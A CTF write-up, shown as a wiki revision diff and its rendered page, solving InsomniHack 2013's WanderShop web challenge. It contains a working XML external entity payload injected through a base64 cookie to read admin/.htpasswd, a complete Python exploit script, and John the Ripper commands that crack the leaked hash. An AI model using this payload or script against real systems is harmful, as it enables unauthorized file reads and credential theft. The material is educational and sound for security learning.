Difference between revisions of "InsomniHack-2013/Web2/WanderShop"
From Fixme.ch
(→Summary) |
|||
| (7 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
== Summary == | == Summary == | ||
| − | + | If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolutely no cash for this. | |
| − | + | Could you break into his shop and get us as many items as you can? | |
| − | + | Goal : Access the admin page | |
== Solution == | == Solution == | ||
| Line 17: | Line 17: | ||
</basket> | </basket> | ||
</pre> | </pre> | ||
| − | * We can then inject XML with the cookie, we use external entities which allow to manipulate local files and display the result in the XML | + | * We can then inject XML with the cookie, we use [https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing XML external entities] which allow to manipulate local files and display the result in the XML |
| − | < | + | <syntaxhighlight lang="xml"> |
<!DOCTYPE basket | <!DOCTYPE basket | ||
[ | [ | ||
| Line 26: | Line 26: | ||
<item type="5" name="asd">&item;</item> | <item type="5" name="asd">&item;</item> | ||
</basket> | </basket> | ||
| − | </ | + | </syntaxhighlight> |
* The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table. | * The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table. | ||
| + | * Here's the HTML result | ||
| + | <syntaxhighlight lang="html4strict"> | ||
| + | <!DOCTYPE html> | ||
| + | <html lang="en"> | ||
| + | <head> | ||
| + | <title>Wander Shop</title> | ||
| + | <link rel="StyleSheet" href="css/bootstrap.min.css" type="text/css"/> | ||
| + | <script src="js/bootstrap.min.js"></script> | ||
| + | </head> | ||
| + | <body> | ||
| + | <div class="container"> | ||
| + | <h1>Wander Shop</h1> | ||
| + | Verify your cart:<table class='table table-condensed'><tr><td>admin:sQcHhNWX6v1VM | ||
| + | </td><td>x</td><td>asd</td></tr></table> | ||
| + | <form action="pay.php"> | ||
| + | <input type="submit" value="Pay"/> | ||
| + | </form> | ||
| + | </div> | ||
| + | </body> | ||
| + | </html> | ||
| + | </syntaxhighlight> | ||
| + | * The password is in CRYPT format, which is easily bruteforced with john the ripper | ||
| + | echo 'admin:sQcHhNWX6v1VM' > /tmp/pass | ||
| + | john /tmp/pass | ||
| + | >slamas (admin) | ||
| + | * The flag is in the admin page | ||
| + | |||
| + | * Complete script | ||
| + | <syntaxhighlight lang="python"> | ||
| + | #!/usr/bin/env python | ||
| + | |||
| + | import requests, urllib2, base64 | ||
| + | |||
| + | url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/' | ||
| + | payload=''' | ||
| + | <!DOCTYPE basket | ||
| + | [ | ||
| + | <!ENTITY item SYSTEM "admin/.htpasswd"> | ||
| + | ]> | ||
| + | <basket> | ||
| + | <item type="5" name="asd">&item;</item> | ||
| + | </basket> | ||
| + | ''' | ||
| + | |||
| + | payload = urllib2.quote(base64.encodestring(payload)) | ||
| + | |||
| + | cookie = {'basket': payload} | ||
| + | r = requests.get(url + 'checkout.php', cookies=cookie) | ||
| + | print r.content | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | == See also == | ||
| + | * [[InsomniHack-2013]] | ||
Latest revision as of 14:32, 26 March 2013
Summary
If we are to survive this world, we are going to need some weapons. This shady merchant seems to be selling some interesting stuff. Unfortunately, we have absolutely no cash for this. Could you break into his shop and get us as many items as you can? Goal : Access the admin page
Solution
- The admin page is protected with http auth on /admin
- The shop items are saved in a cookie. Which decodes to an xml description of the basket, base64 and url encoded.
In [11]: a='PD94bWwgdmVyc2lvbj0iMS4wIj8%2BCjxiYXNrZXQ%2BCiAgICA8aXRlbSB0eXBlPSI1IiBuYW1lPSJT%0Ad29yZCI%2BNTwvaXRlbT4KICAgIDxpdGVtIHR5cGU9IjQiIG5hbWU9IktuaWZlIj40PC9pdGVtPgo8%0AL2Jhc2tldD4KCg%3D%3D'
In [12]: print base64.decodestring(urllib2.unquote(a))
<?xml version="1.0"?>
<basket>
<item type="5" name="Sword">5</item>
<item type="4" name="Knife">4</item>
</basket>
- We can then inject XML with the cookie, we use XML external entities which allow to manipulate local files and display the result in the XML
<!DOCTYPE basket [ <!ENTITY item SYSTEM "admin/.htpasswd"> ]> <basket> <item type="5" name="asd">&item;</item> </basket>
- The result of the XML is parsed and displayed in the paying page, so we put the content of the .htpasswd file in an item element which will be displayed in the table.
- Here's the HTML result
<!DOCTYPE html> <html lang="en"> <head> <title>Wander Shop</title> <link rel="StyleSheet" href="css/bootstrap.min.css" type="text/css"/> <script src="js/bootstrap.min.js"></script> </head> <body> <div class="container"> <h1>Wander Shop</h1> Verify your cart:<table class='table table-condensed'><tr><td>admin:sQcHhNWX6v1VM </td><td>x</td><td>asd</td></tr></table> <form action="pay.php"> <input type="submit" value="Pay"/> </form> </div> </body> </html>
- The password is in CRYPT format, which is easily bruteforced with john the ripper
echo 'admin:sQcHhNWX6v1VM' > /tmp/pass john /tmp/pass >slamas (admin)
- The flag is in the admin page
- Complete script
#!/usr/bin/env python import requests, urllib2, base64 url = 'http://web02.insomni.hack/1a5b4e6f811a0bc0dcb8fdd773bdb51c571be4e6/' payload=''' <!DOCTYPE basket [ <!ENTITY item SYSTEM "admin/.htpasswd"> ]> <basket> <item type="5" name="asd">&item;</item> </basket> ''' payload = urllib2.quote(base64.encodestring(payload)) cookie = {'basket': payload} r = requests.get(url + 'checkout.php', cookies=cookie) print r.content
